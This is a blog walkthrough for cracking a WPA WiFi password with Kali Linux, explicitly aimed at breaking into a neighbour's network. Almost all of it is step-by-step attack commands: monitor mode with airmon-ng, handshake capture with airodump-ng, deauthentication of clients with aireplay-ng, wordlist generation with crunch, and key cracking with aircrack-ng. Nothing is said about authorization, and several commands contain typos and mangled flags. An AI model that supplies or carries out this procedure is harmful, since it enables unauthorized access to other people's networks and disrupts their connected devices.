The following blog illustrates Wireless password cracking. The demonstration video is attached in the end. We will learn how to Hack into neighbor’s WiFi. You need the following prerequisites for successfully executing the task:
Pre-Requisites:
- -Kali Linux
- -Router
- -Laptop connected to that router
- -Wireless adaptor that supports monitor mode
Here we use Alfa AWUS036NHA adapter which is compatible with Kali Linux. Monitor mode allows the card to listen to the packets. It captures the handshake. Check if the system is reading the WiFi card.
iwconfing
Step 1: Kill all the running processes
To kill the running processes we use the following command:
airmon-ng check kill
Step 2: Enable Monitor Mode
The following command is used to enable the monitor mode. This mode is used to intercept and listen to the packets.
airmon-ng start wlan0
wlan0 is the interface
Step 3: Scan the networks in the surrounding
As the card is in monitor mode now, we need to capture the packets in the surrounding. We use the following command:
airodump-ng
This command scans the available networks in the surrounding and lists critical information like the BSSID, ESSID, Beacons, Power and Channel Number.
Step 4: Capture the packets on a specific network
airodump-ng –c9 --bssid 70:4F:57:21:49:86 --w capture wlan0mon
- –c9 – Channel number
- 70:4F:57:21:49:86 – BSSID of the AP
- –w – To write the captured packets to a file.
- capture –File where captured packets are written,
- wlan0mon – Interface
We wait for it to capture the handshake.
Step 5: Capture the WPA handshake
We see that it has captured the 4-way handshake between a device and a router. Sometimes, deAuth needs to be used to capture the handshake by kicking off a client so that it reconnects again. We can perform it by the use of following command:
aireplay-ng -0 1 –a 70:4F:57:21:49:86 -c <Channel no. of the client>
This command performs the deAuth attack once. You may have to perform it multiple times. It is recommended not to use the same client in every attack.
Step 6: Generate a password list
Once the handshake captured is done, the process of capturing packets is stopped. Now we see the captured packets and find a file 01.cap with “.cap” extension.
Password list can either be found online as we have taken from GitHub or it can be created using the following command which gives all permutation if letters are known.
crunch 0 9 abcd1234 –o abcd.txt
- 9- Maximum length of the password
- abcd1234- Character set
- abcd.txt- File where all the permutations of given character set is saved.
Step 7: Crack the password
Finally, use the following command to crack the password
aircrack-ng –w pswdlist –b 70:4F:57:21:49:86 capture 01.cap
It will take some time to go through the list and will give you the password. Congratulations!
You can watch the detailed video demonstration here: